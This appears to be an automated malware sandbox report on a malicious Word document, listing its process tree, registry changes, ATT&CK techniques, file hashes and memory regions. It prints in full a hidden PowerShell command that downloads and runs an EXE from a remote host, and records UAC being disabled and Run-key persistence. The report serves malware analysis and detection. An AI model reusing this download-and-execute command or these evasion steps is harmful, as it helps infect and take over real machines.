PID 1612 wrote to memory of 2172	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 2172	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 2372	1612	EXCEL.exe	EXCEL.exe
PID 1612 wrote to memory of 2372	1612	EXCEL.exe	EXCEL.exe
PID 1612 wrote to memory of 2372	1612	EXCEL.exe	EXCEL.exe
PID 1612 wrote to memory of 2372	1612	EXCEL.exe	EXCEL.exe
PID 1612 wrote to memory of 2372	1612	EXCEL.exe	EXCEL.exe
PID 1612 wrote to memory of 2372	1612	EXCEL.exe	EXCEL.exe
PID 1612 wrote to memory of 2372	1612	EXCEL.exe	EXCEL.exe
PID 1612 wrote to memory of 2372	1612	EXCEL.exe	EXCEL.exe
PID 1612 wrote to memory of 2372	1612	EXCEL.exe	EXCEL.exe
PID 1612 wrote to memory of 2372	1612	EXCEL.exe	EXCEL.exe
PID 1612 wrote to memory of 2372	1612	EXCEL.exe	EXCEL.exe
PID 2372 wrote to memory of 2416	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2416	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2416	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2416	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2416	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2416	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2416	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2416	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2416	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2432	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2432	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2432	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2432	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2432	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2432	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2432	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2432	2372	EXCEL.exe	iexplore.exe
PID 2372 wrote to memory of 2432	2372	EXCEL.exe	iexplore.exe

System policy modification 1 TTPs 1 IoCs
evasion

Modify Registry
T1112

Processes:

EXCEL.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EXCEL.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	EXCEL.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\IMG_Order PO 094765 SMH.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712

C:\Users\Admin\AppData\Roaming\EXCEL.exe
"C:\Users\Admin\AppData\Roaming\EXCEL.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.facebook.com
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.twitter.com
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2172

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
4⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2372

C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
5⤵
PID:2416

C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
5⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2432

C:\Windows\SysWOW64\notepad.exe
notepad.exe
6⤵
PID:2464

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2064

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
MD5
f6200b9b9789794de4a8d78f4ae96d22

SHA1
1d18c71e7e4de5c6216653db5effba586345597c

SHA256
85f0af15d708b6a2ea67a30f2a858efc9f32af678a5633289c297f588443cd7a

SHA512
5fd2e93293bf2ebe5b68e747dbed842c2f4fcd74dce883ffa7daa6daf647e41f4b1926fdf2f05048b3024609ef6805fb2a6b501c92335ab37098dfb6d4defa72

Download Submit
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
MD5
f6200b9b9789794de4a8d78f4ae96d22

SHA1
1d18c71e7e4de5c6216653db5effba586345597c

SHA256
85f0af15d708b6a2ea67a30f2a858efc9f32af678a5633289c297f588443cd7a

SHA512
5fd2e93293bf2ebe5b68e747dbed842c2f4fcd74dce883ffa7daa6daf647e41f4b1926fdf2f05048b3024609ef6805fb2a6b501c92335ab37098dfb6d4defa72

Download Submit
C:\Users\Admin\AppData\Roaming\EXCEL.exe
MD5
d8ae3cbe899a87b5222fbb894166d546

SHA1
139a8055baaf43a29849771e8403e321484ef0a2

SHA256
903d79d960ff3bf5e5aa880f9f3c067b47dedde70a76fdb43c5ef9cc9fe16804

SHA512
4f421b885c0a3e80eb12c3fe4665e365c9233bcf16cf8425e30f0b0ddd81517bfa1b1bc4445806e591b048d6bd1c4bebf23cbc3f03c8a785b9f94c7c56bf289c

Download Submit
C:\Users\Admin\AppData\Roaming\EXCEL.exe
MD5
f6200b9b9789794de4a8d78f4ae96d22

SHA1
1d18c71e7e4de5c6216653db5effba586345597c

SHA256
85f0af15d708b6a2ea67a30f2a858efc9f32af678a5633289c297f588443cd7a

SHA512
5fd2e93293bf2ebe5b68e747dbed842c2f4fcd74dce883ffa7daa6daf647e41f4b1926fdf2f05048b3024609ef6805fb2a6b501c92335ab37098dfb6d4defa72

Download Submit
C:\Users\Admin\AppData\Roaming\EXCEL.exe
MD5
f6200b9b9789794de4a8d78f4ae96d22

SHA1
1d18c71e7e4de5c6216653db5effba586345597c

SHA256
85f0af15d708b6a2ea67a30f2a858efc9f32af678a5633289c297f588443cd7a

SHA512
5fd2e93293bf2ebe5b68e747dbed842c2f4fcd74dce883ffa7daa6daf647e41f4b1926fdf2f05048b3024609ef6805fb2a6b501c92335ab37098dfb6d4defa72

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
b4df5569627eab6624eb2f76448a6d53

SHA1
bd122618f90371ba80098c1325a8aa475bc229ba

SHA256
2591c1576ea805d336c0427163ae8780cd84fdfca02206d423343a43e5924b63

SHA512
89c8ce9fe5712517dff2d388c9e6055c2d3098bf7a040d7570de4864c983e39b67cacdfee616c32e20b3f385a0b8479a6c8571c63a272eaa0a12fd3999a730a7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
b4df5569627eab6624eb2f76448a6d53

SHA1
bd122618f90371ba80098c1325a8aa475bc229ba

SHA256
2591c1576ea805d336c0427163ae8780cd84fdfca02206d423343a43e5924b63

SHA512
89c8ce9fe5712517dff2d388c9e6055c2d3098bf7a040d7570de4864c983e39b67cacdfee616c32e20b3f385a0b8479a6c8571c63a272eaa0a12fd3999a730a7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
b4df5569627eab6624eb2f76448a6d53

SHA1
bd122618f90371ba80098c1325a8aa475bc229ba

SHA256
2591c1576ea805d336c0427163ae8780cd84fdfca02206d423343a43e5924b63

SHA512
89c8ce9fe5712517dff2d388c9e6055c2d3098bf7a040d7570de4864c983e39b67cacdfee616c32e20b3f385a0b8479a6c8571c63a272eaa0a12fd3999a730a7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
b4df5569627eab6624eb2f76448a6d53

SHA1
bd122618f90371ba80098c1325a8aa475bc229ba

SHA256
2591c1576ea805d336c0427163ae8780cd84fdfca02206d423343a43e5924b63

SHA512
89c8ce9fe5712517dff2d388c9e6055c2d3098bf7a040d7570de4864c983e39b67cacdfee616c32e20b3f385a0b8479a6c8571c63a272eaa0a12fd3999a730a7

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\EXCEL.exe
MD5
f6200b9b9789794de4a8d78f4ae96d22

SHA1
1d18c71e7e4de5c6216653db5effba586345597c

SHA256
85f0af15d708b6a2ea67a30f2a858efc9f32af678a5633289c297f588443cd7a

SHA512
5fd2e93293bf2ebe5b68e747dbed842c2f4fcd74dce883ffa7daa6daf647e41f4b1926fdf2f05048b3024609ef6805fb2a6b501c92335ab37098dfb6d4defa72

Download Submit
\Users\Admin\AppData\Roaming\EXCEL.exe
MD5
f6200b9b9789794de4a8d78f4ae96d22

SHA1
1d18c71e7e4de5c6216653db5effba586345597c

SHA256
85f0af15d708b6a2ea67a30f2a858efc9f32af678a5633289c297f588443cd7a

SHA512
5fd2e93293bf2ebe5b68e747dbed842c2f4fcd74dce883ffa7daa6daf647e41f4b1926fdf2f05048b3024609ef6805fb2a6b501c92335ab37098dfb6d4defa72

Download Submit
memory/956-77-0x0000000000000000-mapping.dmp

Download
memory/956-85-0x0000000001D90000-0x0000000001D91000-memory.dmp

Filesize
4KB

Download
memory/956-91-0x0000000001D92000-0x0000000001D94000-memory.dmp

Filesize
8KB

Download
memory/956-90-0x0000000001D91000-0x0000000001D92000-memory.dmp

Filesize
4KB

Download
memory/956-96-0x0000000005D80000-0x0000000005E71000-memory.dmp

Filesize
964KB

Download
memory/1160-64-0x0000000004B70000-0x00000000050A6000-memory.dmp

Filesize
5.2MB

Download
memory/1160-59-0x0000000000000000-mapping.dmp

Download
memory/1560-86-0x0000000002451000-0x0000000002452000-memory.dmp

Filesize
4KB

Download
memory/1560-88-0x0000000002452000-0x0000000002454000-memory.dmp

Filesize
8KB

Download
memory/1560-76-0x0000000000000000-mapping.dmp

Download
memory/1560-94-0x0000000005E80000-0x0000000005F71000-memory.dmp

Filesize
964KB

Download
memory/1560-84-0x0000000002450000-0x0000000002451000-memory.dmp

Filesize
4KB

Download
memory/1612-102-0x0000000000B20000-0x0000000000B50000-memory.dmp

Filesize
192KB

Download
memory/1612-69-0x0000000000000000-mapping.dmp

Download
memory/1612-74-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1612-72-0x0000000000DB0000-0x0000000000DB1000-memory.dmp

Filesize
4KB

Download
memory/1612-101-0x0000000004E10000-0x0000000004E56000-memory.dmp

Filesize
280KB

Download
memory/1632-55-0x000000006FD61000-0x000000006FD63000-memory.dmp

Filesize
8KB

Download
memory/1632-57-0x0000000074C81000-0x0000000074C83000-memory.dmp

Filesize
8KB

Download
memory/1632-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1632-54-0x00000000722E1000-0x00000000722E4000-memory.dmp

Filesize
12KB

Download
memory/1712-63-0x0000000004B90000-0x00000000050C6000-memory.dmp

Filesize
5.2MB

Download
memory/1712-66-0x0000000002620000-0x000000000326A000-memory.dmp

Filesize
12.3MB

Download
memory/1712-65-0x0000000002620000-0x000000000326A000-memory.dmp

Filesize
12.3MB

Download
memory/1712-58-0x0000000000000000-mapping.dmp

Download
memory/1972-95-0x0000000005F10000-0x0000000006001000-memory.dmp

Filesize
964KB

Download
memory/1972-89-0x0000000002460000-0x00000000030AA000-memory.dmp

Filesize
12.3MB

Download
memory/1972-75-0x0000000000000000-mapping.dmp

Download
memory/1972-92-0x0000000002460000-0x00000000030AA000-memory.dmp

Filesize
12.3MB

Download
memory/1972-87-0x0000000002460000-0x00000000030AA000-memory.dmp

Filesize
12.3MB

Download
memory/2064-97-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp

Filesize
8KB

Download
memory/2064-93-0x0000000000000000-mapping.dmp

Download
memory/2172-98-0x0000000000000000-mapping.dmp

Download
memory/2372-104-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/2372-105-0x00000000004010B8-mapping.dmp

Download
memory/2416-111-0x0000000000401364-mapping.dmp

Download
memory/2432-112-0x0000000000400000-0x0000000000443000-memory.dmp

Filesize
268KB

Download
memory/2432-113-0x0000000000401364-mapping.dmp

Download
memory/2432-114-0x0000000000590000-0x00000000006E3000-memory.dmp

Filesize
1.3MB

Download
memory/2464-117-0x0000000000000000-mapping.dmp

Download